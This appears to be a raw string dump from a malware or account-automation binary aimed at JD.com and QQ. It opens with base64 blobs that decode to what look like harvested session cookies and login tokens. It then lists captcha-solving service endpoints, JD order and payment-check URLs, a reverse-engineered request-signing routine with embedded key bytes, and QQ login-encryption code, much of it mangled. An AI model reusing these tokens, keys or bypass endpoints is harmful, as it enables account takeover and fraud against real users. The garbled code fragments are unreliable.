OTA2RjMzMkExREVCMUVGNDMwRTQ4RDUwQjU4MjMxMDQyMUVEQUEyNDAxQjU0QUUzOTM4OUQ1NzRGRDZFOTgyQThEMkY5RjlBNjlGNjg1OEU4NkMxNDMwMURCNzVFMzVDNTA5OENCMDtvbD0xO190cD03aEVqanZkdWNUS3hVNzJZd0FPYWp3JTNEJTNEOw==
X3BzdD0lRTQlQkElQkElRTYlQjAlOTElRTclODglODYlRTglOEYlOEElRTglODAlODU7VHJhY2tJRD0xRm1FTTAtSEVDc3YwYkk4Qk11RWFPc0JsMW5vampreEZQWlhTUzRrLWtGYnRQNlNaLTdCMFJSM2gtQld3LVo2RXJEUjluYk5sU3I3YmpsbE1NelExXzF6U1ZXQTBkRV8zWi11RHRsNGpqMGF4NFJHWWJ3Umcyc1V3NmI2QW9iS3U7cGluSWQ9RWFQYThVSmR4a1NoaGlSWTF3bHBRUTttcD0lRTQlQkElQkElRTYlQjAlOTElRTclODglODYlRTglOEYlOEElRTglODAlODU7cGluPSVFNCVCQSVCQSVFNiVCMCU5MSVFNyU4OCU4NiVFOCU4RiU4QSVFOCU4MCU4NTtsb2dpbmluZz0xO3VuaWNrPSVFNCVCQSVCQSVFNiVCMCU5MSVFNyU4OCU4NiVFOCU4RiU4QSVFOCU4MCU4NTtsaWdodGluZz1GQjgxM0JDQUUwQ0RGNkJCNTRCNkQ4RjdBMTU0RDZBOTkzQjI0OEFDQzBFNEMzNEU4ODY1QjVCMEVCOTJFRDg3MjM1OUZBQjY4REFGREZGRkZGMEU3OEUxMjIyM0JEMEFFMTlFNkFGMDg3QzUwQzg3Q0UwMkNEQjIzRDA4NjZEMDZDNUZDNzA2NDUzRkNEMjg4NzgwRUZGRjMzQ0EyMjg3QjFFQjIzOEUxRUVCQzY4RTNCMDQzMDQxNkU5RjQ1RURBRjNEMzUxMzk5OUQzN0E3MTIyREJGNjFFRDA1NjMzOUM0MTk3N0RDQUZDRjA1QTAwQ0RGNTBFNDg1QTc3OTRCO3Rob3I9QjAxNDM3OUY4RDVEQkM3NzJEODMzRDc3Njk2QTg2Mjg4Rjk2MkQ5NTVGQkE4NjUzQkU0QkEyMUFFMjE5Nzc3QUQyMUE0NzRGNjY3MDhEMDRFM0Y3NzM5NkM3RTlDMkI3ODVDNzk5Qjg2MUY5NjYzQjZCNDkxRDJFMkMyQTVDRjFGQkIzRENGNjdGOTM5MEI2Njg4RTFEOUVDOTNBREIzOUE1M0VFMDE4M0EzREI3RTZFNzREOUVGNTQxQzE3NTJFMUJEQUNGMzRBREI4RDRDNjVBMjlCMjQ4NkYyMEE5MUQ1NEM3ODc1N0U5Q0YwQzY4NERENzAzODBFNTI3MTI3MDtvbD0xO190cD16cHM5Q28yY3N5RnVXcjFlbWV5MGZ5NFRweXUlMkZSamtEMXMlMkZvcmtiTXhnY0xTbUhwcFV3JTJCNnBCand6cjBGTzA4Ow==
X3BzdD1sdW11MDA4NjtUcmFja0lEPTFQVzVIaGtPVElRbGJUcTdfN2xSWUNuZ2tmaXM3LVNFVG1EZ1pGcldDTkdqRDlMUEV1RVVyNWFKOWlsOUlLeU5nRnJ1ZnVId2NXUTh2MmNJbVpvSEpQeHVJMkZWa1FtOFlwTzFjVG1KSGJNNWkxcmtiRmFjWnhnZFZIWTNETU9kUztwaW5JZD0zNWlSZEdZcGI0aTFmZnNmbjk4SS13O21wPWx1bXUwMDg2O3Bpbj1sdW11MDA4Njtsb2dpbmluZz0xO3VuaWNrPWx1bXUwMDg2O2xpZ2h0aW5nPTI1ODlGNzc4NkZBRDI0OUM3MDk4Qzc1NEVDRjMxMTc3ODQwNjRCNjU5NUZERkQ0MThDODZGNTUyOTA3Q0U5RDc2MTExQUQ5QUQ1MkMyMjQyRjFFOENGNzAzQURGMzI2RjEwQUYwRTZDRUExNjAzQjU5NzBBN0EyOUMzOEZCOEM4NjczRkJDMDMwOTA0RTNFNzNFQzU2Njc4QTkzMzM1RUE2NDczOTNGMDg0NTY3RUZCMkE4MTM3QTJCM0VBRjVENDE0N0VDQjdERTBFN0FDMzQwRTcyRERBNEM5RThDQkFDMUQzRTkzNTZCQjM2NjRFMjRDQTVDMUYyNUM2M0U0NTZDQ0ZCQjIzNUJFODhBNDI3RjFBNTU1MTRDNDNCMUM0Njt0aG9yPUQ2ODk0MjNFMDhCQjlDMUREN0NDRTI5QjUxNjY5OTc0RTU0NzcxNkIxNDY0OUQ0MDFBMzVGRDIzNkU1OTYyOUI1MEU5ODQwQ0RDNkYwNzM3NUM1Q0Q3MkNEQkRCRTg3REVENzhFQjg1NjNENTM4NzUwRTU0QzNEMEFFMTIxOENFQjQ1NUVBMEJEQTJENjg4Mzk4NDY4QjdEOTREN0FCNjVDRjQ4MjJERDQ5QzQ5RUE4MUYwMEVDNTdERjhFNDNCMUQ1ODU4OTEwQTgyMkM1NzA4RTIyRTA2NTRGQUM4NDlGM0FFOUJBMEZFQjI1MUY4NDI0Q0E3MzJEREJBMzI2RkVFNTgyREIwRUVGQzQ1Q0I2Qjg4NkE2NDFBMUE1ODAwNjtvbD0xO190cD1Ta1VMJTJGbXBGSm9Ma0wlMkY5OHExR3AlMkZBJTNEJTNEOw==
X3BzdD1nYW5rYW5nODEyOTkzO1RyYWNrSUQ9MXdCQ0IxMXBwZDZ0VUFzdTZmT3NjOU14dERvbUJHMDYxOXI3azZQNTJhVjhaRHJKTzYzM1lxbENaeW15cEdZYVF4U3N2ZHVNNmdEMU43ZGxhdFh2Y01nO3BpbklkPTIyc3dNSFpEZDhWeldfUGh4QzVhZHc7cGluPWdhbmthbmc4MTI5OTM7bG9naW5pbmc9MTt1bmljaz1nYW5rYW5nODEyOTkzO3Rob3I9MTg2MjExMkJEMkI3MTI3MUFGNkY3NjM5OTczM0ZCNDk1RTdGMTlBMTRFNEI5QUM5NERFNUFCRTg3MjkxRThGMkMzRjRFNkQ4NjMyRTg1QTIyMUI1RUI3MUMwQzFFQ0RCMEI3QzNBOTBFQkU2Q0E2MzI1RUU4RUE4OURFNjEzM0U3QUQ4RkMyMkNCRUVBMzc5MzlGMDgxNTREREY3N0E3Qzg2MjMwODM0NEE5OUEwOUZGMUVCRDNGN0REQTE2RDczNkFBODYxRTExNDQ2RDEzMTc1OUNEMzgwMEFCOTI5MzI2QkExRkFEOTg4MjU2N0Y0NUM5MTFBNkQzMUZEM0EzMzQxN0NBN0Q1OEYwNDNFRjVCRjNDNTgxOTc5MEI5QTdBO2xpZ2h0aW5nPTdEMjBFMDg2ODQzNDJCNTk1RTI4NjI0RDQzQkVBMDY1M0MwOUFBMTQzN0I2QjY3RDU3QkU0Q0ZFQzc1MTEzQjI5QkQzRjk2OEFCOTgxMEM5MENCNzY0M0Y5MDExMEQ5QUVDRThBRTlDODQ1NzFFRUFEREM2NUQ3NUJEMDAxRDRBQUY5RjIyMTNCNDJDNTFEMkQzMzY0MTRBRTRFQUY4OTQ5MUQ1OTEzQkZFNDc3ODUyRkE4NkE1QzY4REEzNjQyODZCMTFEQ0Y3NTk1NDUzMEFBRjZBMEM0MkE0MEZCMjdDODlFRkFFMEUwOUIwNDg2MjQ5RDRCOEY0Q0MyOEM5NzhGM0YxNUUzN0EwQ0NGODlGNkVDQzBEMUU3MzYzNTUxMjtvbD0xO190cD1tc3lOeDJRUmlINTJ6SFBZTHN2c1pnJTNEJTNEOw==
X3BzdD0lRTclQTElODAlRTglQjglOEYlRTYlOEMlQTglRTUlODElQjclRTUlOEIlQkU7VHJhY2tJRD0xUzFFQnZTd2FGbDY5UmxManZaakNCQkpVRUxzUW5WU2stNXoyWl9ZZEthYlh5eHVPdnNid1U1U3NmLXhXd1RieHpiTnFxeE5CaUF6SzkzN2RXN29TclE7cGluSWQ9UzZkbG5NUXZ0Tk1oSlBULTQtek56QTtwaW49JUU3JUExJTgwJUU4JUI4JThGJUU2JThDJUE4JUU1JTgxJUI3JUU1JThCJUJFO2xvZ2luaW5nPTE7dW5pY2s9aGVzaHVpaHVhbGU7dGhvcj01REUyMjA0N0VGQzBCQjAzNEVDOTE2OUEyNDM1NDBBRTBEMkM3REU5NUVGOUY2NjMwMUMyOTg4QTRCQjkxRTc2NUU0NDdCMEEzQ0EzQzQ0REM3MEUxNTg3RTVFMTVERTQxREYwQTgxODAwQUE1ODA3N0YzQ0ZCNUY4QUIxNTg2MDMwNzJCMkYyM0ZEOEM1NDAxMzRDQUFCNDUwMTI5N0IyNEZDMzZDOTM4NDY1REEzMEIxRkY2QjlGRUYyNTg2NjcwQjhGMTcyREVEM0I3MEE2NDBCNzY2NjlFQzJFNkE2NjQwNEZBMjRCRTNEREM4QUI0RDE0RkQyQTY0NzQ4QjVDO2xpZ2h0aW5nPUJBMDU1MzMwMzJDRDFDMTc5MkU0NUQ3RTYwQ0NCRDkwMUNCRUUzNzM2RjU0MUU5NkM3MzIyNkIxNTIxRkIyQ0MwNkFGNzVDMEI3MTY3NDQ0N0JFRUM1QjJFRkI0RDkzN0JCNzRBRjg3MjI1NDQ4ODkyMkNEMUVGOEE3Q0M2OTBGMzQ3NTVBMTc4QzZBMDVGQTg2NDhCMzNCOTYxOEQ0RjQ5NkQxMTYxQTQ4NkZBQkRFMUU0NDgzRUM4RTFFQjVGMUY3QzFFNjYzRTc1MkQ4ODA4N0FEN0E0ODdGNEQ0MkY2Q0YwNzg3Mjg1MEQwQ0RFMEJGN0IyNDVDNzRDQUNCNjk7b2w9MTtfdHA9Z2pJNU92cmRaYjdtdEduSU5MJTJGV0N1QjdRS1dac2ZUZkJvS0Q0VyUyRkx3THF3UWNKdkJnMTNsb01ldVhGNGZBcGk7
X3BzdD0lRTUlOEQlQUIlRTclOEUlQUYlRTUlOTAlOUIlRTYlOUYlQUYlRTUlODclQTElRTclOUMlOUZHRjg3O1RyYWNrSUQ9MS12QWduOEVjN1VJdEl4NmhaekIyT3dLUGdlaTZRVThZUzAtMkFrUk1XZ0l1Z2VNSGp2V05HMXgyNGFrV2lSaU9vZDg2bnVVaEdnWmxFUWkybmhtOHRmTDdZVU4tWVJXbzNGOTFLYm1fWHkwO3BpbklkPWM2QWN1NE5Cc255Y1J5UjAxT05QZDBMSGxERU54ZU5rO3Bpbj0lRTUlOEQlQUIlRTclOEUlQUYlRTUlOTAlOUIlRTYlOUYlQUYlRTUlODclQTElRTclOUMlOUZHRjg3O2xvZ2luaW5nPTE7dW5pY2s9JUU1JThEJUFCJUU3JThFJUFGJUU1JTkwJTlCJUU2JTlGJUFGJUU1JTg3JUExJUU3JTlDJTlGR0Y4Nzt0aG9yPUFDNzk0NTY0NjdDMkRGNjZEQ0Y3M0U1MzdBN0Q5QTI1NEU1OUZEOTQ2RDI3RjcyREU0MzhDMzEzMDM3OUJDNENCRjM3QTFBQjcyNjY5QkM2REQ2RDFCMjVDRUREREM0MjY2N0VFMEY5RTU5NDAyQTBCMUIyMEYyMUQwNTJCNjZBQUI2RkMyMThGRUY0RTY5QjJGM0MxQzlERjExNDY2MzA0NDY5MUQyNDQ2RjI1QTlBMEVCQzhDMzVCOTM3NjQ1NzUxODExNEE1ODdCQjA2OTI4MEY5QTY5MjEwNEMzM0EzQTBDNjJEODU3N0UwRDQ2REM0QzcxNzkzM0JERjI5RERCQTgzODVGMEQ5Q0I2NzM5QUYyODM4Q0Q2NDU3QUZDRjtvbD0xO190cD1GbHdRZEhqSkU0JTJCY0h5b3lXTThxR1BYTHQxd0pSRmVqblZRRGNvYm93VGhZNkoyN1klMkJESjElMkJ4bGlTSlAwUkV5TCUyRm0lMkZINFlCck1hc2RLckhKV1V3YkElM0QlM0Q7
X3BzdD0lRTYlQTIlODElRTclQkUlQTQlRTYlQjElOUYlRTYlQUYlOUIlRTklOUMlODclRTYlQTUlQTB5aTYyO1RyYWNrSUQ9MUtwUEhLVjBneHR2NFBQMFNNZ29GQ2pkcEpieFROLUlocmVFVm82RG5rVWduZlExdlJqVkhlLU9obnBYdDVkUVBxbWFubzhJa0NsUXZTVHp3c0RvSVc2amVudkhWNksxbjZSUUk4YjJvS3RFO3BpbklkPU1wRnU4akhQdjV5SUZYd3E4Y0VzY2kwY1FVNnpDNGJ0O3Bpbj0lRTYlQTIlODElRTclQkUlQTQlRTYlQjElOUYlRTYlQUYlOUIlRTklOUMlODclRTYlQTUlQTB5aTYyO2xvZ2luaW5nPTE7dW5pY2s9JUU2JUEyJTgxJUU3JUJFJUE0JUU2JUIxJTlGJUU2JUFGJTlCJUU5JTlDJTg3JUU2JUE1JUEweWk2Mjt0aG9yPTY2MTEzNjc2NjU4ODdBOTI1OEEzQzlERDY1OUYyQTNFNjRBNjgyNTkxNTBFRDRFMkM0NTk3OTYzNjI1RkMzN0M0RDkwMkMwMDYxQUI2NTZBQTAxMkQ1QzdGNjZFNUZDMEREMjQzQjE2REJFNzg2ODhCQ0EwMDkxNjg5N0QwMDhBNDI3OTlCNkY2RUJBRjIwMUY3OTA1Q0NEOUMyNjQ2OUZDOTMyREQ0NTNBQzcwRTJDODNGOTVERTcxQkM0NUY0NUJCQUEwQTQzRTI5ODM1RDU4OTM0NjY1NjUwNURGRDgxRjE2QUZGRDIxQTVEMkFBOTIwNUI3MDg5QjBGQ0MzMDlEOTQ4MzhCMDA1REQwRUFBMjEyNEI2Rjg2MTY0Q0JDRDtvbD0xO190cD1rdEloNFlxMkd5dWhKR2E4OVJyT1QlMkJrS3NhMlRiUVVsZXdlbUElMkJudVk5c2VGVEhTYXUzR0VwWVBUQ1lCM3d6c284RGpsNXU5STdnTUdWdHFOYWYlMkJCdyUzRCUzRDs=X3BzdD0lRTglODglOTIlRTQlQjglQkQlRTclQkElQUYlRTglOEMlODMlRTYlOUQlQkVVVHk4NzQ7VHJhY2tJRD0xTGNLVXlJSjQxa1Q3VkFxcjAwMjVnTGVXZS1hTU9xUUVQVzE1VjItWjd2dDNhcWc2aVU2T3lVMnlEbDVXWU1WNXZXOU02dXcybGl2TEsteW5YVHNna0VuNTBteHVFMnhrZ3dRcW9QaGk4OGM7cGluSWQ9blJ6UlM0MG82V1lHRGZlQ0hlY3Rya3NNUHJDc2NjbTk7cGluPSVFOCU4OCU5MiVFNCVCOCVCRCVFNyVCQSVBRiVFOCU4QyU4MyVFNiU5RCVCRVVUeTg3NDtsb2dpbmluZz0xO3VuaWNrPSVFOCU4OCU5MiVFNCVCOCVCRCVFNyVCQSVBRiVFOCU4QyU4MyVFNiU5RCVCRVVUeTg3NDt0aG9yPTRFMzlDQUU5MkM4MjcwRTY1OEEzMTVDNzUwQ0JCODRDNjk4MTY4NTgwRkY3MkRGOURCODk0QTdFMTJEM0NGOTREMkZBN0Y5QTQ3MTAzRTY4OEI1NjQxRTlCMzYzNTE5OTlDNjIxMTExNDk2MjQ0ODRBMTgwOUE2MUFCOTgyMjkxREU5NDU3RkE2Mjc4OUZBOUJGMUZCREJGQkVEQkVFQjU4MDJDNTE4Q0Q5RTAzNjQ0MDE5Nzc1NDMwMjM5NUJEMjc2RTgxNUI2NzIxMjEwMUZGNDFCRThGQzk5MDMxQ0Y1NDZEOUIyQzhEMDNGMTUyMTE3ODAxRUY5MDgzQkJBQkFGMjUxMEM5MEI2Njg4MjIxMkU5RjBDMEFEN0UyQkU0QztvbD0xO190cD1JTkZleTRPekxRVVdlYm9BRnFPVlJkYkVhdXg5anVZcUxuZ05rZVVyd3pGVDBnYmtUN3JVRGQwbnY5ODB1aDJheFRiWlF0Wk1VUjNuSUlMWlp2OXZMZyUzRCUzRDs=
cHQyZ2d1aW49bzI5MzA3MjY4ODE7IHVpbj1vMjkzMDcyNjg4MTsgc2tleT1ARjkxY2JJa1NzOyBwdG5pY2tfMjkzMDcyNjg4MT03Njc0Njk2ZTY2NzE3MzsgY29uZmlybXVpbj0wOyBwdGlzcD1jdGM7O3J1cmw9aHR0cCUzQSUyRiUyRndxcy5qZC5jb20lMkZteSUyRmluZGV4LnNodG1sJTNGUFRBRyUzRDE3MDA4LjEuNSUyNnNob3duYXYlM0QxOzs7VHJhY2tJRD03dWphYm5CRjQ1dWhpci1IcXRSS3N3cTVUd3U5anB6QXlSSjNnbVVYa0Z4NnY5YmJ4RFpYZ2hBTjdkTzFyZ2JDRWZEODlhWHhROE5XRHFrUlZodjdUemZwd0xob1VmRTh2bDlsLUU2Y3FXYXNiSEtmOXR0LUhpbm1qNzZmWTEzYXprVnpHVjhoRmlQMVVZcmNOWTZZU1J3NzVxenJOaUtMR2Y4LTZYQ0FpSzQ7YnV5X3Vpbj00NjE3OTY3MDMyO2pkcGluPXpib3pibzk2ODI7bmlja25hbWU9dnRpbmZxcztwaWN0dXJlX3VybD1odHRwJTNBJTJGJTJGcS5xbG9nby5jbiUyRnFxYXBwJTJGMTAwMjczMDIwJTJGMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwOTUwOTIyQTklMkY0MDtwaW5pZD1fZUdDc2pmV2ExTlMzcmdETUR6aEt3O3BpbnNpZ249ZWU4ODA4OTk1ZmRiYjU0ZWFkYzI5NGY3NThlMDhlOGY7c3Ffb3Blbl9pZD0wMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDA5NTA5MjJBOTt3Z19za2V5PXpxNkVFRTY4RjM3MjlDRDU7d2dfdWluPTQ2MTc5NjcwMzI7d3Ffc2tleT16cTZFRUU2OEYzNzI5Q0Q1O3dxX3Vpbj00NjE3OTY3MDMyOzs=cHQyZ2d1aW49bzI5MzA3MjY4ODE7IHVpbj1vMjkzMDcyNjg4MTsgc2tleT1ARjkxY2JJa1NzOyBwdG5pY2tfMjkzMDcyNjg4MT03Njc0Njk2ZTY2NzE3MzsgY29uZmlybXVpbj0wOyBwdGlzcD1jdGM7O3J1cmw9aHR0cCUzQSUyRiUyRndxcy5qZC5jb20lMkZteSUyRmluZGV4LnNodG1sJTNGUFRBRyUzRDE3MDA4LjEuNSUyNnNob3duYXYlM0QxOzs7VHJhY2tJRD03dWphYm5CRjQ1dWhpci1IcXRSS3N3cTVUd3U5anB6QXlSSjNnbVVYa0Z4NnY5YmJ4RFpYZ2hBTjdkTzFyZ2JDRWZEODlhWHhROE5XRHFrUlZodjdUemZwd0xob1VmRTh2bDlsLUU2Y3FXYXNiSEtmOXR0LUhpbm1qNzZmWTEzYXprVnpHVjhoRmlQMVVZcmNOWTZZU1J3NzVxenJOaUtMR2Y4LTZYQ0FpSzQ7YnV5X3Vpbj00NjE3OTY3MDMyO2pkcGluPXpib3pibzk2ODI7bmlja25hbWU9dnRpbmZxcztwaWN0dXJlX3VybD1odHRwJTNBJTJGJTJGcS5xbG9nby5jbiUyRnFxYXBwJTJGMTAwMjczMDIwJTJGMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwOTUwOTIyQTklMkY0MDtwaW5pZD1fZUdDc2pmV2ExTlMzcmdETUR6aEt3O3BpbnNpZ249ZWU4ODA4OTk1ZmRiYjU0ZWFkYzI5NGY3NThlMDhlOGY7c3Ffb3Blbl9pZD0wMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDA5NTA5MjJBOTt3Z19za2V5PXpxNkVFRTY4RjM3MjlDRDU7d2dfdWluPTQ2MTc5NjcwMzI7d3Ffc2tleT16cTZFRUU2OEYzNzI5Q0Q1O3dxX3Vpbj00NjE3OTY3MDMyOzs=
0F3D-2DCF-20CE-CEE
CCaptchaRecognizer::recognizeByCodeTypeAndUrl
hXXp://s1.uudati.com:
hXXp://s1.taskok.com:
hXXp://s1.uudama.com:
hXXp://s1.uuwise.com:
/Api/config.aspx
2.0.0.4
WiseClientAPI-2.0.0.4
CCaptchaRecognizer::__UpdateTKEY
CCaptchaRecognizer::_IsNeedLogin
/Api/DecodeImg.aspx
xxxxxxxxxxx
hXXp://p1.uuwise.net:
hXXp://p1.uudama.net:
hXXp://p1.taskok.com:
hXXp://p1.uuwise.com:
hXXp://p1.uudama.com:
CCaptchaRecognizer::easyRecognizeUrl
%d%d%d%d%d
CCaptchaRecognizer::_CalcRandomPort
/Api/VerifyAPIFile.aspx
/Api/UserLogin.aspx
CCaptchaRecognizer::login
/Api/UserReg.aspx
/Api/PayCard.aspx
/Api/ReportError.aspx
CCaptchaRecognizer::reportError
/Api/UserPoint.aspx
|2.0.0.4|
/Api/DecodeResult.aspx
CHttpRequestHelper::_ReadResponse
User-Agent:WiseClient-2.0.0.4;
WiseClient-2.0.0.4
CHttpRequestHelper::_InternalRequest
CHttpRequestHelper::RequestGetImage
CHttpRequestHelper::RequestPost
UUExtConfig.ini
3.cn.pool.ntp.org
2.cn.pool.ntp.org
1.cn.pool.ntp.org
0.cn.pool.ntp.org
cn.pool.ntp.org
!"#$%&'()* ,-.
uuwise.com
2, 0, 0, 4
1.0.0.1
1, 0, 6, 6
- Skin.dll
9.5.25.212
1, 0, 0, 1
woniu.DLL
Windows
1.1.0.0
2.1.0.0
CrackCaptchAPI.dll
yundama.com
1.0.0.6
!"#$%&'()* ,-
25, 0, 0, 1
(*.*)
1.0.0.0
(hXXp://VVV.dywt.com.cn)

%original file name%.exe_2060_rwx_00401000_0100D000:

t%SVh
t$(SSh
H%D?6
u.hTi6
~%UVW
u$SShe
K(.wS
kernel32.dll
ole32.dll
shlwapi.dll
ntdll.dll
CrackCaptchaAPI.dll
MayiAPI.dll
yundamaAPI.dll
FastVerCode.dll
dc.dll
woniu.dll
MiMidama.dll
systemvc.dll
gdiplus.dll
Ole32.dll
user32.dll
UUWiseHelper.dll
Mimidama.dll
wininet.dll
ShellExecuteA
MsgWaitForMultipleObjects
GetProcessHeap
ReportResult
YDM_Report
uu_reportError
ReportError
ReportError_A
reportError
GdiplusShutdown
Login2
uu_loginA
YDM_Login
HttpOpenRequestA
HttpSendRequestA
HttpQueryInfoA
{B6F7542F-B8FE-46a8-9605-98856A687097}
42305932-06E6-47a5-AC79-8BDCDC58DF61
WebBrowser
password
hXXp://VVV.zolpay.com/links/7931AAEAF687F1CC
1970-01-01 08:00:00
hXXp://api.m.taobao.com/rest/api.do?api=mtop.common.getTimestamp
Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36
WinHttp.WinHttpRequest.5.1
\config.ini
_applogin_=
hXXp://m.z.jd.com/inc_focus.action?key=1000&systemId=
.html
hXXp://m.z.jd.com/project/details/
focusCounter.focus
focusCounter.praise
hXXp://m.z.jd.com/inc_praise.action?key=1000&systemId=
hXXp://zt.m.jd.com/funding/support_project.action?projectId=
;psq/11;ref/;pap/JA2015_311210|4.4.3|ANDROID;usc/;usp/;umd/;utr/;adk/;ads/;Mozilla/5.0 (Linux; Android 5.1.1; A0001 Build/LMY47V; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/43.0.2357.121 Mobile Safari/537.36
;network/wifi;osp/android;apv/4.4.3;osv/5.1.1;uid/
jdapp;android;4.4.3;5.1.1;
com.jingdong.app.mall
data-value="(.*?)".*?data-key="(.*?)"
hXXp://payrisk.jd.com/m.html
hXXp://zt.m.jd.com/funding/m_list_address.action?projectId=
hXXp://zt.m.jd.com/funding/m_project_subscribe.action
application/x-www-form-urlencoded
;network/4g;Mozilla/5.0 (Linux; U; Android 4.3; zh-cn; A0001 Build/JLS36C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
jdapp;android;4.2.1;4.3;
UPDATE JDorder SET payURL='
wskey=
hXXps://wlogin.m.jd.com/applogin_v2
Android WJLoginSDK
wrong password
^[0-9]{1,}$
1.3.3
hXXp://safe.jd.com/user/paymentpassword/getUserSafeInfo.action?callback=jsonp1437220564810&_=
hXXp://order.jd.com/center/list.action
XMLHttpRequest
Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
NotLogin
hXXp://home.jd.com/2014/data/account/profile.action?t=
hXXp://home.jd.com/
5.1.0
&clientVersion=5.1.0&build=31030&client=android&d_brand=ONEPLUS&d_model=A0001&osVersion=4.3&screen=1920*1080&partner=baidu&area=&networkType=wifi&sign=
hXXp://api.m.jd.com/client.action?functionId=newUserAllOrderList&uuid=
Dalvik/1.6.0 (Linux; U; Android 4.3; A0001 Build/JLS36C)
hXXp://wq.jd.com/bases/orderlist/deallist?order_type=1&callback=waitPay&t=
hXXp://wqs.jd.com/order/orderlist_merge.shtml?tab=1
Mozilla/5.0 (Linux; U; Android 4.3; zh-cn; A0001 Build/JLS36C) AppleWebKit/533.1 (KHTML, like Gecko)Version/4.0 MQQBrowser/5.4 TBS/025413 Mobile Safari/533.1 V1_AND_SQ_5.6.0_244_YYB_D QQ/5.6.1.2455 NetType/WIFI WebP/0.3.0
hXXp://home.m.jd.com/myJd/home.action?sid=
Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0
String.prototype.getBytes = function () {
for (var i = 0; i < this.length; i  ) {
var charCode = this.charCodeAt(i);
var cLen = Math.ceil(Math.log(charCode) / Math.log(256));
bytes.push((charCode << (j * 8)) & 0xFF);
for (var result = "", i = 0; i < a.length;   i) {
result  = (String.fromCharCode(a[i]));
for (var bytes = [], c = 0; c < hex.length; c  = 2)
bytes.push(parseInt(hex.substr(c, 2), 16));
for (var hex = [], i = 0; i < bytes.length; i  ) {
hex.push((bytes[i] >>> 4).toString(16));
hex.push((bytes[i] & 0xF).toString(16));
return hex.join("");
var r = ("000000000"   b.toString(2));
for (var bits = [], c = r.length -8; c < r.length; c  ) {
bits.push(parseInt(r.substr(c, 1), 10))
for (var bits = [], c = 0; c < bytes.length; c  ) {
bits.push.apply(bits, byteToBin(bytes[c]))
var r1 = r1.join('');
for (var bytes = [], c = 0; c < r1.length; c  = 8) {
bytes.push(parseInt(r1.substr(c, 8), 2));
var key_256 = hexToBytes("35e4a6df9c309a87edbd845dc2e751701f7bb72090b986716{sign_key}3961561a010b4d6eb91fdac0e3bbe68c126f854f9ba129863ef426b254f593abce81e49d3078905a31aa1029bb288ff017fb06e7eabc60074467c5fe22d2e0c818a721183cde956ce75ca7d9e522c536fa43cdc0bd8aa2af2e33769feec78ea3879b8f6c9a7b697bb5e278cda3e8fd4d0484793e0036cdd6a24b5d25c6d1c8e2f45c8c377c00432e5c75044e68028a5fcd1d7f3b3de0f67cf4a08a9f5bfccf77617574b33211bb11929d50631d99455404139f118ee1d82604d22620a955b3d3f9d4e145834c45a99e10913ae8b73237a36adfbfa2b{sign_key}db0d9fa81692a285c565f08d4ccbf4af");
var key_8 = hexToBytes("51f34cd789ab206e");
var hash_len = Math.floor(r.length / 8) * 8;
r[i] ^= key_256[i % 256];
r[i] = ((((iv_8[v5] << (8 - v5)) | (iv_8[v5] >> v5)) ^ r[i]) & ~key_8[v5] | key_8[v5] & ~((((iv_8[v5] << (8 - v5)) | (iv_8[v5] >> v5)) ^ r[i]) & 0xFF & key_8[v5])) & 0xFF
var process_len = r.length - hash_len;
r2 = fix_1(r.slice(hash_len));
r2 = fix_2(r.slice(hash_len));
r2 = fix_3(r.slice(hash_len));
r2 = fix_4(r.slice(hash_len));
r2 = fix_5(r.slice(hash_len));
r2 = fix_6(r.slice(hash_len));
r2 = fix_7(r.slice(hash_len));
var r3 = r.slice(0, hash_len)
r3.push.apply(r3, r2);
{sign_key}
for(var i = 0, len = str.length; i < len;   i)
hash  = (hash << 5)   str.charAt(i).charCodeAt();
4.4.2
4.4.5
1920*1080
000000010005
001200280020
00000000
TEAKEY
\Mimidama.dll
\MiMidama.dll
.text
`.rdata
@.data
.rsrc
@.reloc
SSSSh
$SShh
ByScreen.JPG
c:\i.ini
operator
GetProcessWindowStation
E:\work\mimi
\Mimidama.pdb
KERNEL32.dll
USER32.dll
GDI32.dll
RegCloseKey
RegOpenKeyExW
ADVAPI32.dll
SHELL32.dll
OLEAUT32.dll
SHLWAPI.dll
URLDownloadToFileW
urlmon.dll
dbghelp.dll
IPHLPAPI.DLL
GetCPInfo
Mimidama.DLL
Login
RecUrl
uu_loginW
uu_recognizeByCodeTypeAndUrlA
uu_recognizeByCodeTypeAndUrlW
<requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel>
6064686<6
7(8,80848
6o6
9!9&959?9
6$6(6,6064686<6@6
7(7/74787<7]7
7&8,8084888
; ;$;(;0;
hXXp://api.ruokuai.com/register.xml
hXXp://api.ruokuai.com/info.xml
hXXp://api.ruokuai.com/recharge.xml
hXXp://api.ruokuai.com/create.xml
hXXp://api.ruokuai.com/reporterror.xml
8CB52174-D9F4-4B8D-AC9B-E6EFEE79FEEA
32F1C86B-E64C-4EAF-8BC1-C142570008BC
SESSIONkEY
-12027,TEAKEY
key hash
hXXp://check.ptlogin2.qq.com/check?pt_tea=1&uin=
Mozilla/5.0 (Linux; U; Android 4.2.2; zh-cn; H30-U10 Build/HuaweiH30-U10) AppleWebKit/533.1 (KHTML, like Gecko)Version/4.0 MQQBrowser/5.7 Mobile Safari/533.1 V1_AND_SQ_5.4.0_218_YYB_D QQ/5.4.1.2390 NetType/3G
hXXp://captcha.qq.com/cap_union_show?captype=3&lang=2052&aid=716027609&uin=
hXXp://captcha.qq.com/getimgbysig?aid=716027609&uin=
&0.6598044210113585
hXXp://captcha.qq.com/cap_union_verify?aid=716027609&uin=
var p = encrypt.Encryption.getEncryption(p, u, code);
encrypt.RSA = function() {
while (z   aC < aB.length) {
t  = aB.substring(z, z   aC)   "\n";
return t   aB.substring(z, aB.length)
return "0"   t.toString(16)
return t.toString(16)
if (aF < aC.length   11) {
var aB = aC.length - 1;
var aD = aC.charCodeAt(aB--);
z.nextBytes(t)
this.dmp1 = null;
this.dmq1 = null;
this.coeff = null
if (z != null && t != null && z.length > 0 && t.length > 0) {
uv_alert("Invalid RSA public key")
return t.modPowInt(this.e, this.n)
var t = ag(aB, (this.n.bitLength()   7) >> 3);
